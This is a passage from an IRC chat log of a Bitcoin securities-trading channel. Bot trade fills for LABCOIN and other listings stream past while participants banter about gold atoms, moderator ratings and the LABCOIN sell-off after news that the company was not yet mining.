3.983 BTC [-] Sep 14 07:46:32 [BTCTC] [CIPHERMINE.B1] 50 @ 0.01048 = 0.524 BTC [-] Sep 14 07:47:10 !t btctc labcoin Sep 14 07:47:12 [BTCT:LABCOIN] 1D: 0.002264 / 0.00288 / 0.003572 (678306 shares, 1953.7 BTC), 7D: 0.002264 / 0.00327 / 0.003989 (2691685 shares, 8790.3 BTC), 30D: 0.001587 / 0.00304 / 0.003989 (10336314 shares, 31390.7 BTC) Sep 14 07:47:27 32k btc huh ? Sep 14 07:47:28 surely. Sep 14 07:47:33 [BTCTC] [LABCOIN] 111 @ 0.00231 = 0.2564 BTC [+] Sep 14 07:47:35 [BTCTC] [LABCOIN] 889 @ 0.002308 = 2.0518 BTC [-] Sep 14 07:47:47 [BTCTC] [LABCOIN] 111 @ 0.002312 = 0.2566 BTC [+] Sep 14 07:47:49 [BTCTC] [LABCOIN] 111 @ 0.002308 = 0.2562 BTC [-] Sep 14 07:47:50 [BTCTC] [LABCOIN] 2272 @ 0.002305 = 5.237 BTC [-] Sep 14 07:47:51 [BTCTC] [LABCOIN] 99 @ 0.002304 = 0.2281 BTC [-] Sep 14 07:47:52 [BTCTC] [LABCOIN] 93 @ 0.002304 = 0.2143 BTC [-] Sep 14 07:47:54 [BTCTC] [LABCOIN] 814 @ 0.002304 = 1.8755 BTC [-] Sep 14 07:49:05 [BTCTC] [LABCOIN] 74 @ 0.002311 = 0.171 BTC [+] Sep 14 07:49:06 [BTCTC] [LABCOIN] 249 @ 0.002309 = 0.5749 BTC [-] Sep 14 07:52:10 burnside is making a killing of labcoin eh mircea, imagine you had labcoin trading on your mpex.. you'd be a rich man Sep 14 07:52:38 you should perhaps compare the published s.mpoe monthly results with the unpublished scamtc returns Sep 14 07:52:49 you might discover i made more last month than burside in his entire lifetime. Sep 14 07:53:22 [BTCTC] [ACTIVEMINING] 20 @ 0.003022 = 0.0604 BTC [+] Sep 14 07:53:23 [BTCTC] [ACTIVEMINING] 20 @ 0.003029 = 0.0606 BTC [+] Sep 14 07:53:24 [BTCTC] [ACTIVEMINING] 10 @ 0.00303 = 0.0303 BTC [+] Sep 14 07:53:26 [BTCTC] [ACTIVEMINING] 298 @ 0.003038 = 0.9053 BTC [+] Sep 14 07:53:27 [BTCTC] [ACTIVEMINING] 130 @ 0.003039 = 0.3951 BTC [+] Sep 14 07:53:28 [BTCTC] [ACTIVEMINING] 1139 @ 0.00304 = 3.4626 BTC [+] Sep 14 07:53:46 [MPEX] [S.MPOE] 1634 @ 0.0009086 = 1.4847 BTC [+] Sep 14 07:53:54 [BTCTC] [LABCOIN] 5 @ 0.002311 = 0.0116 BTC [+] Sep 14 07:53:55 [BTCTC] [LABCOIN] 5 @ 0.00231 = 0.0116 BTC [-] Sep 14 07:53:56 [BTCTC] [LABCOIN] 51 @ 0.002309 = 0.1178 BTC [-] Sep 14 07:53:58 [BTCTC] [LABCOIN] 458 @ 0.002306 = 1.0561 BTC [-] Sep 14 07:53:58 [MPEX] [S.MPOE] 3578 @ 0.00090886 = 3.2519 BTC [+] Sep 14 07:53:59 [BTCTC] [LABCOIN] 200 @ 0.002305 = 0.461 BTC [-] Sep 14 07:54:00 LABCOIN is worth 3 trillion at least. Sep 14 07:54:00 [BTCTC] [LABCOIN] 1806 @ 0.002305 = 4.1628 BTC [-] Sep 14 07:54:01 [BTCTC] [LABCOIN] 3000 @ 0.002304 = 6.912 BTC [-] Sep 14 07:54:02 [BTCTC] [LABCOIN] 283 @ 0.002304 = 0.652 BTC [-] Sep 14 07:54:03 [BTCTC] [LABCOIN] 400 @ 0.002303 = 0.9212 BTC [-] Sep 14 07:54:04 [BTCTC] [LABCOIN] 2216 @ 0.002303 = 5.1034 BTC [-] Sep 14 07:54:05 [BTCTC] [LABCOIN] 700 @ 0.002303 = 1.6121 BTC [-] Sep 14 07:54:06 [BTCTC] [LABCOIN] 3000 @ 0.002302 = 6.906 BTC [-] Sep 14 07:54:07 [BTCTC] [LABCOIN] 3300 @ 0.002301 = 7.5933 BTC [-] Sep 14 07:54:07 [BTCTC] [LABCOIN] 400 @ 0.002301 = 0.9204 BTC [-] Sep 14 07:54:08 [BTCTC] [LABCOIN] 100 @ 0.0023 = 0.23 BTC [-] Sep 14 07:54:09 [BTCTC] [LABCOIN] 120 @ 0.0023 = 0.276 BTC [-] Sep 14 07:54:10 [BTCTC] [LABCOIN] 5000 @ 0.0023 = 11.5 BTC [-] Sep 14 07:54:11 [BTCTC] [LABCOIN] 100 @ 0.0023 = 0.23 BTC [-] Sep 14 07:54:40 yeah. i hear the scam foundation and some irrelevant farts are making a new Child Porn Coin Sep 14 07:54:46 it's worth 3 trn of those easy. Sep 14 07:55:29 I was going to say, atoms of gold. And almost everything is worth at least 3 trillion atoms of gold. Sep 14 07:55:41 [BTCTC] [LABCOIN] 500 @ 0.002297 = 1.1485 BTC [-] Sep 14 07:55:43 [BTCTC] [LABCOIN] 2900 @ 0.00229 = 6.641 BTC [-] Sep 14 07:55:44 [BTCTC] [LABCOIN] 100 @ 0.002287 = 0.2287 BTC [-] Sep 14 07:56:00 [BTCTC] [LABCOIN] 700 @ 0.002287 = 1.6009 BTC [-] Sep 14 07:56:02 [BTCTC] [LABCOIN] 2300 @ 0.002285 = 5.2555 BTC [-] Sep 14 07:56:15 im not even sure you can count 3 trn gold atoms precisely. Sep 14 07:56:59 1/333,333,333.333..th of a gram of gold. I'm pretty sure you can't indeed. Sep 14 07:58:15 [BTCTC] [ACTIVEMINING] 217 @ 0.00304 = 0.6597 BTC [+] Sep 14 07:58:26 [BTCTC] [LABCOIN] 526 @ 0.002285 = 1.2019 BTC [-] Sep 14 07:58:27 [BTCTC] [LABCOIN] 500 @ 0.002285 = 1.1425 BTC [-] Sep 14 07:58:28 [BTCTC] [LABCOIN] 4523 @ 0.002284 = 10.3305 BTC [-] Sep 14 07:59:04 I believe that's about 1/10th of a satoshi considering current gold value per gram and price per BTC. Sep 14 07:59:07 [HAVELOCK] [SDSTM] 5 @ 0.00248 = 0.0124 BTC [-] Sep 14 07:59:20 [HAVELOCK] [SDSTM] 100 @ 0.00247 = 0.247 BTC [-] Sep 14 07:59:31 can't be that much. Sep 14 07:59:33 [BTCTC] [LABCOIN] 150 @ 0.002305 = 0.3458 BTC [+] Sep 14 07:59:40 what is it, 6.023*10^23 per mol ? Sep 14 08:00:00 ;;google au atomic mass Sep 14 08:00:01 Chemical Elements.com - Gold (Au): ; Gold - Wikipedia, the free encyclopedia: ; Gold Facts - Periodic Table of the Chemical Elements - Chemistry: Sep 14 08:00:07 fucking useless google srsly. Sep 14 08:00:30 yes, and gold is 196.97g per mol Sep 14 08:01:33 [HAVELOCK] [LABCO] 58 @ 0.003 = 0.174 BTC [-] Sep 14 08:01:35 $avg Sep 14 08:01:36 mircea_popescu: 137.36 Sep 14 08:01:41 [HAVELOCK] [LABCO] 10 @ 0.002911 = 0.0291 BTC [-] Sep 14 08:01:41 ;;calc 6.023*10**23 / 196.96655 / 28.3495 * 1320 / 137.36 Sep 14 08:01:42 1036546120556580306944 Sep 14 08:01:47 [HAVELOCK] [LABCO] 70 @ 0.002889 = 0.2022 BTC [-] Sep 14 08:01:55 [HAVELOCK] [LABCO] 10 @ 0.0028 = 0.028 BTC [-] Sep 14 08:02:00 [HAVELOCK] [LABCO] 285 @ 0.00271001 = 0.7724 BTC [-] Sep 14 08:02:27 seems there's 10^21 atoms in a bitcoin. Sep 14 08:03:14 ;;calc 0.000000001 * 1036546120556580306944 Sep 14 08:03:15 1.03654612056e+12 Sep 14 08:03:15 [HAVELOCK] [XBOND] 1 @ 0.0011869 BTC [-] Sep 14 08:03:15 a trn is 10^12 in your jurisdiction huh ? then indeed, 1/10 Sep 14 08:03:35 oh. Well I said 3 trillion. Thus 3/10th of a satoshi. Sep 14 08:03:36 [BTCTC] [LABCOIN] 280 @ 0.002282 = 0.639 BTC [-] Sep 14 08:03:37 [BTCTC] [LABCOIN] 200 @ 0.002282 = 0.4564 BTC [-] Sep 14 08:03:39 [BTCTC] [LABCOIN] 55 @ 0.002281 = 0.1255 BTC [-] Sep 14 08:03:40 [BTCTC] [LABCOIN] 2000 @ 0.002281 = 4.562 BTC [-] Sep 14 08:03:41 [BTCTC] [LABCOIN] 150 @ 0.002281 = 0.3422 BTC [-] Sep 14 08:03:42 [BTCTC] [LABCOIN] 2000 @ 0.00228 = 4.56 BTC [-] Sep 14 08:03:44 [BTCTC] [LABCOIN] 5000 @ 0.00228 = 11.4 BTC [-] Sep 14 08:03:45 [BTCTC] [LABCOIN] 100 @ 0.00228 = 0.228 BTC [-] Sep 14 08:03:46 [BTCTC] [LABCOIN] 400 @ 0.00228 = 0.912 BTC [-] Sep 14 08:03:50 I was off by a factor of 3. Sep 14 08:03:50 [HAVELOCK] [LABCO] 189 @ 0.00271001 = 0.5122 BTC [-] Sep 14 08:03:52 [HAVELOCK] [LABCO] 10 @ 0.00271 = 0.0271 BTC [-] Sep 14 08:03:52 i was thinking 10^9 for some unexplained reason. Sep 14 08:05:42 [BTCTC] [LABCOIN] 600 @ 0.002275 = 1.365 BTC [-] Sep 14 08:05:43 [BTCTC] [LABCOIN] 400 @ 0.002265 = 0.906 BTC [-] Sep 14 08:05:46 [BTCTC] [LABCOIN] 1600 @ 0.002265 = 3.624 BTC [-] Sep 14 08:05:48 [BTCTC] [LABCOIN] 7539 @ 0.002264 = 17.0683 BTC [-] Sep 14 08:05:49 [BTCTC] [LABCOIN] 1000 @ 0.002264 = 2.264 BTC [-] Sep 14 08:06:30 [BTCTC] [LABCOIN] 765 @ 0.00226 = 1.7289 BTC [-] Sep 14 08:06:32 [BTCTC] [LABCOIN] 50 @ 0.002253 = 0.1127 BTC [-] Sep 14 08:06:33 [BTCTC] [LABCOIN] 185 @ 0.002252 = 0.4166 BTC [-] Sep 14 08:06:43 [BTCTC] [ACTIVEMINING] 179 @ 0.00304 = 0.5442 BTC [+] Sep 14 08:06:56 [BTCTC] [LABCOIN] 510 @ 0.002264 = 1.1546 BTC [+] Sep 14 08:07:49 [BTCTC] [LABCOIN] 5405 @ 0.002252 = 12.1721 BTC [-] Sep 14 08:07:50 [BTCTC] [LABCOIN] 18114 @ 0.002251 = 40.7746 BTC [-] Sep 14 08:08:08 [BTCTC] [BTC-GROWTH] 5 @ 0.101 = 0.505 BTC [+] Sep 14 08:08:20 [HAVELOCK] [SDSTM] 50 @ 0.00243555 = 0.1218 BTC [-] Sep 14 08:08:24 [BTCTC] [ASICMINER-PT] 2 @ 2.16 = 4.32 BTC [-] Sep 14 08:08:47 [HAVELOCK] [SDSTM] 10 @ 0.00243001 = 0.0243 BTC [-] Sep 14 08:08:53 [BTCTC] [LABCOIN] 45 @ 0.002251 = 0.1013 BTC [-] Sep 14 08:08:55 [HAVELOCK] [SDSTM] 8 @ 0.00242 = 0.0194 BTC [-] Sep 14 08:09:22 [HAVELOCK] [CBTC] 50 @ 0.00042 = 0.021 BTC [+] Sep 14 08:09:51 [BTCTC] [LABCOIN] 1841 @ 0.002251 = 4.1441 BTC [-] Sep 14 08:10:03 [BTCTC] [LABCOIN] 7500 @ 0.00225 = 16.875 BTC [-] Sep 14 08:10:06 [BTCTC] [LABCOIN] 1125 @ 0.00225 = 2.5313 BTC [-] Sep 14 08:10:26 [BTCTC] [LABCOIN] 159 @ 0.002251 = 0.3579 BTC [+] Sep 14 08:10:36 [BTCTC] [LABCOIN] 8067 @ 0.00225 = 18.1508 BTC [-] Sep 14 08:11:19 [BTCTC] [LABCOIN] 808 @ 0.00225 = 1.818 BTC [-] Sep 14 08:11:20 [BTCTC] [LABCOIN] 700 @ 0.00222 = 1.554 BTC [-] Sep 14 08:11:22 [BTCTC] [LABCOIN] 100 @ 0.0022 = 0.22 BTC [-] Sep 14 08:11:23 [BTCTC] [LABCOIN] 100 @ 0.0022 = 0.22 BTC [-] Sep 14 08:11:24 [BTCTC] [LABCOIN] 600 @ 0.00216 = 1.296 BTC [-] Sep 14 08:11:52 [BTCTC] [LABCOIN] 1500 @ 0.00215 = 3.225 BTC [-] Sep 14 08:11:54 [BTCTC] [LABCOIN] 638 @ 0.002134 = 1.3615 BTC [-] Sep 14 08:11:55 [BTCTC] [LABCOIN] 100 @ 0.002128 = 0.2128 BTC [-] Sep 14 08:11:56 [BTCTC] [LABCOIN] 100 @ 0.002128 = 0.2128 BTC [-] Sep 14 08:11:57 [BTCTC] [LABCOIN] 1500 @ 0.002124 = 3.186 BTC [-] Sep 14 08:11:58 [BTCTC] [LABCOIN] 3270 @ 0.002113 = 6.9095 BTC [-] Sep 14 08:11:59 [BTCTC] [LABCOIN] 13434 @ 0.002112 = 28.3726 BTC [-] Sep 14 08:12:39 It's odd, BTC-BOND is rated so low. Sep 14 08:12:46 [BTCTC] [LABCOIN] 31 @ 0.002112 = 0.0655 BTC [-] Sep 14 08:12:59 [BTCTC] [LABCOIN] 6535 @ 0.002112 = 13.8019 BTC [-] Sep 14 08:13:02 [BTCTC] [LABCOIN] 31 @ 0.002112 = 0.0655 BTC [-] Sep 14 08:13:03 [BTCTC] [LABCOIN] 69 @ 0.002113 = 0.1458 BTC [+] Sep 14 08:13:34 [BTCTC] [ACTIVEMINING] 10 @ 0.002942 = 0.0294 BTC [-] Sep 14 08:13:36 [BTCTC] [ACTIVEMINING] 125 @ 0.002941 = 0.3676 BTC [-] Sep 14 08:13:37 [BTCTC] [ACTIVEMINING] 31 @ 0.002938 = 0.0911 BTC [-] Sep 14 08:13:37 [BTCTC] [ACTIVEMINING] 2 @ 0.002934 = 0.0059 BTC [-] Sep 14 08:13:38 [BTCTC] [ACTIVEMINING] 250 @ 0.002913 = 0.7283 BTC [-] Sep 14 08:13:40 [BTCTC] [ACTIVEMINING] 502 @ 0.002912 = 1.4618 BTC [-] Sep 14 08:15:01 [BTCTC] [LABCOIN] 3 @ 0.002191 = 0.0066 BTC [+] Sep 14 08:15:02 [BTCTC] [LABCOIN] 20 @ 0.002114 = 0.0423 BTC [-] Sep 14 08:15:04 [BTCTC] [LABCOIN] 200 @ 0.002113 = 0.4226 BTC [-] Sep 14 08:15:05 [BTCTC] [LABCOIN] 72 @ 0.002112 = 0.1521 BTC [-] Sep 14 08:15:52 [HAVELOCK] [LABCO] 6 @ 0.00271 = 0.0163 BTC [-] Sep 14 08:16:19 [BTCTC] [LABCOIN] 72 @ 0.002112 = 0.1521 BTC [-] Sep 14 08:16:20 [BTCTC] [LABCOIN] 178 @ 0.002112 = 0.3759 BTC [-] Sep 14 08:16:22 [BTCTC] [LABCOIN] 7465 @ 0.002112 = 15.7661 BTC [-] Sep 14 08:16:25 [BTCTC] [LABCOIN] 72 @ 0.002112 = 0.1521 BTC [-] Sep 14 08:16:26 [BTCTC] [LABCOIN] 25 @ 0.002111 = 0.0528 BTC [-] Sep 14 08:16:27 [BTCTC] [LABCOIN] 700 @ 0.00211 = 1.477 BTC [-] Sep 14 08:16:28 [BTCTC] [LABCOIN] 1200 @ 0.002103 = 2.5236 BTC [-] Sep 14 08:16:29 [BTCTC] [LABCOIN] 4153 @ 0.002102 = 8.7296 BTC [-] Sep 14 08:17:55 Can you believe that? Out of 39 assets, only 5 rank lower in score. Sep 14 08:17:58 [BTCTC] [LABCOIN] 300 @ 0.002121 = 0.6363 BTC [+] Sep 14 08:18:00 [BTCTC] [LABCOIN] 3000 @ 0.00212 = 6.36 BTC [-] Sep 14 08:18:01 [BTCTC] [LABCOIN] 6802 @ 0.002102 = 14.2978 BTC [-] Sep 14 08:18:26 and it ties with another as 33th position. Sep 14 08:18:44 [BTCTC] [LABCOIN] 97 @ 0.00212 = 0.2056 BTC [+] Sep 14 08:18:59 [BTCTC] [LABCOIN] 3 @ 0.00212 = 0.0064 BTC [+] Sep 14 08:19:13 [BTCTC] [LABCOIN] 8000 @ 0.002104 = 16.832 BTC [-] Sep 14 08:19:14 [HAVELOCK] [LABCO] 195 @ 0.00271 = 0.5285 BTC [-] Sep 14 08:19:15 [BTCTC] [LABCOIN] 1045 @ 0.002102 = 2.1966 BTC [-] Sep 14 08:19:16 Namworld what score be this ? Sep 14 08:19:16 [BTCTC] [LABCOIN] 45 @ 0.002101 = 0.0945 BTC [-] Sep 14 08:19:17 [BTCTC] [LABCOIN] 250 @ 0.0021 = 0.525 BTC [-] Sep 14 08:19:18 [BTCTC] [LABCOIN] 100 @ 0.0021 = 0.21 BTC [-] Sep 14 08:19:19 [BTCTC] [LABCOIN] 100 @ 0.0021 = 0.21 BTC [-] Sep 14 08:19:20 [BTCTC] [LABCOIN] 200 @ 0.002071 = 0.4142 BTC [-] Sep 14 08:19:21 [BTCTC] [LABCOIN] 291 @ 0.002071 = 0.6027 BTC [-] Sep 14 08:19:22 [BTCTC] [LABCOIN] 10000 @ 0.00207 = 20.7 BTC [-] Sep 14 08:19:23 [BTCTC] [LABCOIN] 623 @ 0.00206 = 1.2834 BTC [-] Sep 14 08:19:25 [BTCTC] [LABCOIN] 7000 @ 0.00205 = 14.35 BTC [-] Sep 14 08:19:25 [BTCTC] [LABCOIN] 10000 @ 0.00202 = 20.2 BTC [-] Sep 14 08:19:26 [BTCTC] [LABCOIN] 5000 @ 0.002014 = 10.07 BTC [-] Sep 14 08:19:27 [BTCTC] [LABCOIN] 1000 @ 0.002014 = 2.014 BTC [-] Sep 14 08:19:28 [BTCTC] [LABCOIN] 2100 @ 0.002013 = 4.2273 BTC [-] Sep 14 08:19:29 [BTCTC] [LABCOIN] 60 @ 0.002012 = 0.1207 BTC [-] Sep 14 08:19:30 [BTCTC] [LABCOIN] 2000 @ 0.002012 = 4.024 BTC [-] Sep 14 08:19:31 [BTCTC] [LABCOIN] 20000 @ 0.002011 = 40.22 BTC [-] Sep 14 08:19:32 [BTCTC] [LABCOIN] 1000 @ 0.002011 = 2.011 BTC [-] Sep 14 08:19:33 [BTCTC] [LABCOIN] 200 @ 0.00201 = 0.402 BTC [-] Sep 14 08:19:34 [BTCTC] [LABCOIN] 1 @ 0.00201 BTC [-] Sep 14 08:19:34 [BTCTC] [LABCOIN] 700 @ 0.00201 = 1.407 BTC [-] Sep 14 08:19:35 [BTCTC] [LABCOIN] 185 @ 0.00201 = 0.3719 BTC [-] Sep 14 08:19:36 [BTCTC] [LABCOIN] 4500 @ 0.002002 = 9.009 BTC [-] Sep 14 08:19:37 [BTCTC] [LABCOIN] 4500 @ 0.002 = 9 BTC [-] Sep 14 08:19:38 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [-] Sep 14 08:19:39 [BTCTC] [LABCOIN] 1472 @ 0.002 = 2.944 BTC [-] Sep 14 08:19:48 [BTCTC] [BTC-GROWTH] 3 @ 0.101 = 0.303 BTC [+] Sep 14 08:19:51 [BTCTC] [LABCOIN] 528 @ 0.002 = 1.056 BTC [-] Sep 14 08:19:53 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [-] Sep 14 08:19:54 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [-] Sep 14 08:19:55 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [-] Sep 14 08:19:56 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [-] Sep 14 08:19:57 BTCT.co moderators score. Sep 14 08:19:57 [BTCTC] [LABCOIN] 1900 @ 0.002 = 3.8 BTC [-] Sep 14 08:19:58 [BTCTC] [LABCOIN] 50 @ 0.002 = 0.1 BTC [-] Sep 14 08:19:59 [BTCTC] [LABCOIN] 1000 @ 0.002 = 2 BTC [-] Sep 14 08:20:00 [BTCTC] [LABCOIN] 1840 @ 0.002 = 3.68 BTC [-] Sep 14 08:20:08 It has a score of 2, positive. Sep 14 08:20:21 i don't think you should put that much stock into that. Sep 14 08:20:21 1 positive vote = +1, 1 negative vote = -2 Sep 14 08:20:30 [BTCTC] [LABCOIN] 1000 @ 0.001913 = 1.913 BTC [-] Sep 14 08:20:53 I'm just saying it is odd. Sep 14 08:21:12 you might as well throw darts and wonder why they came out that way. Sep 14 08:21:34 [BTCTC] [TAT.ASICMINER] 27 @ 0.02011 = 0.543 BTC [-] Sep 14 08:21:52 if i buy ltc global shares can I add my own score to labcoin? Sep 14 08:21:54 [BTCTC] [LABCOIN] 2 @ 0.001902 = 0.0038 BTC [-] Sep 14 08:21:56 [BTCTC] [LABCOIN] 916 @ 0.0019 = 1.7404 BTC [-] Sep 14 08:21:57 [BTCTC] [LABCOIN] 60 @ 0.0018 = 0.108 BTC [-] Sep 14 08:21:57 [BTCTC] [LABCOIN] 200 @ 0.0018 = 0.36 BTC [-] Sep 14 08:21:59 [BTCTC] [LABCOIN] 550 @ 0.0018 = 0.99 BTC [-] Sep 14 08:22:00 [BTCTC] [LABCOIN] 600 @ 0.0018 = 1.08 BTC [-] Sep 14 08:22:01 [BTCTC] [LABCOIN] 1672 @ 0.0018 = 3.0096 BTC [-] Sep 14 08:22:06 coconut, definitly. Sep 14 08:22:07 i have few thousand spare ltc Sep 14 08:22:11 [BTCTC] [DMS.SELLING] 202 @ 0.0094 = 1.8988 BTC [-] Sep 14 08:22:13 [BTCTC] [DMS.SELLING] 198 @ 0.009302 = 1.8418 BTC [-] Sep 14 08:22:20 [HAVELOCK] [AM100] 25 @ 0.02014 = 0.5035 BTC [-] Sep 14 08:22:23 thx Sep 14 08:22:25 [BTCTC] [LABCOIN] 328 @ 0.0018 = 0.5904 BTC [-] Sep 14 08:22:31 [HAVELOCK] [AM100] 4 @ 0.02014 = 0.0806 BTC [-] Sep 14 08:23:00 [BTCTC] [COGNITIVE] 3 @ 0.2609 = 0.7827 BTC [-] Sep 14 08:23:01 [BTCTC] [COGNITIVE] 1 @ 0.2609 BTC [-] Sep 14 08:23:02 [BTCTC] [COGNITIVE] 7 @ 0.2607 = 1.8249 BTC [-] Sep 14 08:23:03 [BTCTC] [COGNITIVE] 2 @ 0.2603 = 0.5206 BTC [-] Sep 14 08:23:07 [BTCTC] [LABCOIN] 1 @ 0.001793 BTC [-] Sep 14 08:23:10 [BTCTC] [LABCOIN] 225 @ 0.00171 = 0.3848 BTC [-] Sep 14 08:23:12 [BTCTC] [LABCOIN] 12776 @ 0.001702 = 21.7448 BTC [-] Sep 14 08:23:16 [BTCTC] [LABCOIN] 224 @ 0.001702 = 0.3812 BTC [-] Sep 14 08:23:18 [BTCTC] [LABCOIN] 1000 @ 0.001701 = 1.701 BTC [-] Sep 14 08:23:19 [BTCTC] [LABCOIN] 550 @ 0.0017 = 0.935 BTC [-] Sep 14 08:23:21 [BTCTC] [LABCOIN] 1000 @ 0.0017 = 1.7 BTC [-] Sep 14 08:23:22 [BTCTC] [LABCOIN] 1226 @ 0.0017 = 2.0842 BTC [-] Sep 14 08:23:45 [BTCTC] [LABCOIN] 43 @ 0.0017 = 0.0731 BTC [-] Sep 14 08:24:05 [BTCTC] [LABCOIN] 662 @ 0.001799 = 1.1909 BTC [+] Sep 14 08:24:18 [BTCTC] [LABCOIN] 8731 @ 0.0017 = 14.8427 BTC [-] Sep 14 08:24:52 [BTCTC] [LABCOIN] 222 @ 0.001675 = 0.3719 BTC [-] Sep 14 08:25:09 [BTCTC] [ACTIVEMINING] 109 @ 0.002915 = 0.3177 BTC [+] Sep 14 08:25:10 [BTCTC] [ACTIVEMINING] 341 @ 0.002912 = 0.993 BTC [-] Sep 14 08:25:19 [BTCTC] [ACTIVEMINING] 157 @ 0.002912 = 0.4572 BTC [-] Sep 14 08:25:20 [BTCTC] [LABCOIN] 24 @ 0.001651 = 0.0396 BTC [-] Sep 14 08:25:21 [BTCTC] [TAT.ASICMINER] 23 @ 0.02011 = 0.4625 BTC [-] Sep 14 08:25:28 [BTCTC] [LABCOIN] 1000 @ 0.0016 = 1.6 BTC [-] Sep 14 08:25:30 [BTCTC] [LABCOIN] 500 @ 0.0016 = 0.8 BTC [-] Sep 14 08:25:30 [BTCTC] [LABCOIN] 5000 @ 0.0016 = 8 BTC [-] Sep 14 08:25:31 [BTCTC] [LABCOIN] 12300 @ 0.00155 = 19.065 BTC [-] Sep 14 08:25:32 [BTCTC] [LABCOIN] 4006 @ 0.001527 = 6.1172 BTC [-] Sep 14 08:25:34 [BTCTC] [ACTIVEMINING] 200 @ 0.002912 = 0.5824 BTC [-] Sep 14 08:25:35 [BTCTC] [ACTIVEMINING] 109 @ 0.002912 = 0.3174 BTC [-] Sep 14 08:25:45 [BTCTC] [ASICMINER-PT] 1 @ 2.199 BTC [+] Sep 14 08:25:46 [BTCTC] [ASICMINER-PT] 1 @ 2.199 BTC [+] Sep 14 08:25:48 [BTCTC] [ASICMINER-PT] 4 @ 2.16 = 8.64 BTC [-] Sep 14 08:25:49 [BTCTC] [ASICMINER-PT] 2 @ 2.16 = 4.32 BTC [-] Sep 14 08:25:50 [BTCTC] [ASICMINER-PT] 1 @ 2.151 BTC [-] Sep 14 08:25:50 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [-] Sep 14 08:25:59 [BTCTC] [LABCOIN] 10994 @ 0.001527 = 16.7878 BTC [-] Sep 14 08:26:08 KILL IT WITH FIRE Sep 14 08:26:36 aha! labcoin finally dying? Sep 14 08:26:37 Well.... the wait was long. Sep 14 08:26:55 They're at least having a major hicup. Sep 14 08:26:55 on news? or inevitability? Sep 14 08:26:57 [BTCTC] [LABCOIN] 206 @ 0.001506 = 0.3102 BTC [-] Sep 14 08:26:59 [BTCTC] [LABCOIN] 60 @ 0.001505 = 0.0903 BTC [-] Sep 14 08:27:01 News. Sep 14 08:27:07 They claimed to be hashing. Sep 14 08:27:11 They weren't. Sep 14 08:27:15 come on europe wakey wakey Sep 14 08:27:27 how did non-hashing get proven? Sep 14 08:27:31 Kleeck it was pretty damned amusing tho. Sep 14 08:27:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02011 BTC [-] Sep 14 08:27:34 Basically, they are behind schedule and should've said so Sep 14 08:27:35 [BTCTC] [TAT.ASICMINER] 61 @ 0.02009 = 1.2255 BTC [-] Sep 14 08:27:36 [BTCTC] [TAT.ASICMINER] 55 @ 0.02007 = 1.1039 BTC [-] Sep 14 08:27:37 [BTCTC] [TAT.ASICMINER] 6 @ 0.02005 = 0.1203 BTC [-] Sep 14 08:27:38 [BTCTC] [TAT.ASICMINER] 60 @ 0.02001 = 1.2006 BTC [-] Sep 14 08:27:44 They admitted it tonight. Sep 14 08:27:47 hence the sell off. Sep 14 08:27:52 interesting Sep 14 08:28:07 These kids will be eating it up come div time. Sep 14 08:28:21 They should've just said they are behind schedule. Sep 14 08:28:27 We all knew they were. Sep 14 08:28:31 nah Sep 14 08:28:34 But they tried to cover it up. Sep 14 08:28:38 something doesnt jive Sep 14 08:28:40 and they reap it. Sep 14 08:28:54 [BTCTC] [LABCOIN] 342 @ 0.001507 = 0.5154 BTC [+] Sep 14 08:28:55 [BTCTC] [LABCOIN] 1658 @ 0.001506 = 2.4969 BTC [-] Sep 14 08:28:57 [BTCTC] [DMS.MINING] 681 @ 0.002624 = 1.7869 BTC [+] Sep 14 08:28:58 [BTCTC] [DMS.MINING] 800 @ 0.00262 = 2.096 BTC [-] Sep 14 08:29:00 [BTCTC] [DMS.MINING] 100 @ 0.0026 = 0.26 BTC [-] Sep 14 08:29:01 [BTCTC] [DMS.MINING] 68 @ 0.0026 = 0.1768 BTC [-] Sep 14 08:29:07 "div time" Sep 14 08:29:11 I am absolutely no fanboy, but I think they have a chip, and I think they WILL be mining shortly. Sep 14 08:29:13 how does a business with no income pay "dividends" ? Sep 14 08:29:26 Obviously they have to be mining. Sep 14 08:29:27 they use money collected during ipo Sep 14 08:29:38 [BTCTC] [LABCOIN] 1000 @ 0.001506 = 1.506 BTC [-] Sep 14 08:29:43 I don't think that'll happen. Maybe, but I doubt it. Sep 14 08:29:43 and how does one believe they have a chip when they do nothing but lie? Sep 14 08:29:47 which is fraudulent in every jurisdiction from the weimar republic to the tobriand islands. Sep 14 08:29:50 I really think they'll be hashing. Sep 14 08:29:51 [BTCTC] [LABCOIN] 2 @ 0.001599 = 0.0032 BTC [+] Sep 14 08:29:52 we'll see. Sep 14 08:29:57 I have little on the line either way. Sep 14 08:30:03 [BTCTC] [LABCOIN] 314 @ 0.001599 = 0.5021 BTC [+] Sep 14 08:30:04 [BTCTC] [LABCOIN] 316 @ 0.0016 = 0.5056 BTC [+] Sep 14 08:30:06 Kleeck "will be" fails to translate into dividends tho. Sep 14 08:30:15 dividents come from have been not from will be. Sep 14 08:30:18 [BTCTC] [LABCOIN] 2 @ 0.0016 = 0.0032 BTC [+] Sep 14 08:30:20 [BTCTC] [LABCOIN] 76 @ 0.001507 = 0.1145 BTC [-] Sep 14 08:30:21 [BTCTC] [LABCOIN] 767 @ 0.001506 = 1.1551 BTC [-] Sep 14 08:30:23 [BTCTC] [LABCOIN] 155 @ 0.001501 = 0.2327 BTC [-] Sep 14 08:30:27 Right. Sep 14 08:30:30 o look, 15s are trading. Sep 14 08:30:40 So the first div will be light or non-existent. Sep 14 08:30:51 [BTCTC] [LABCOIN] 845 @ 0.001501 = 1.2683 BTC [-] Sep 14 08:30:54 [BTCTC] [ACTIVEMINING] 300 @ 0.003 = 0.9 BTC [+] Sep 14 08:30:55 [BTCTC] [ACTIVEMINING] 233 @ 0.00291 = 0.678 BTC [-] Sep 14 08:30:57 Hey kako, the bitbet calc is dope Sep 14 08:30:57 [BTCTC] [ACTIVEMINING] 14 @ 0.002909 = 0.0407 BTC [-] Sep 14 08:30:58 [BTCTC] [ACTIVEMINING] 453 @ 0.002907 = 1.3169 BTC [-] Sep 14 08:31:03 I understand how this works. My point is that I think they have hashing power close to deploy. That's all. Sep 14 08:31:04 i hope it leads to more money for you Sep 14 08:31:11 All I need is some hype. Sep 14 08:31:13 actually you're in a prime position to know Sep 14 08:31:18 as 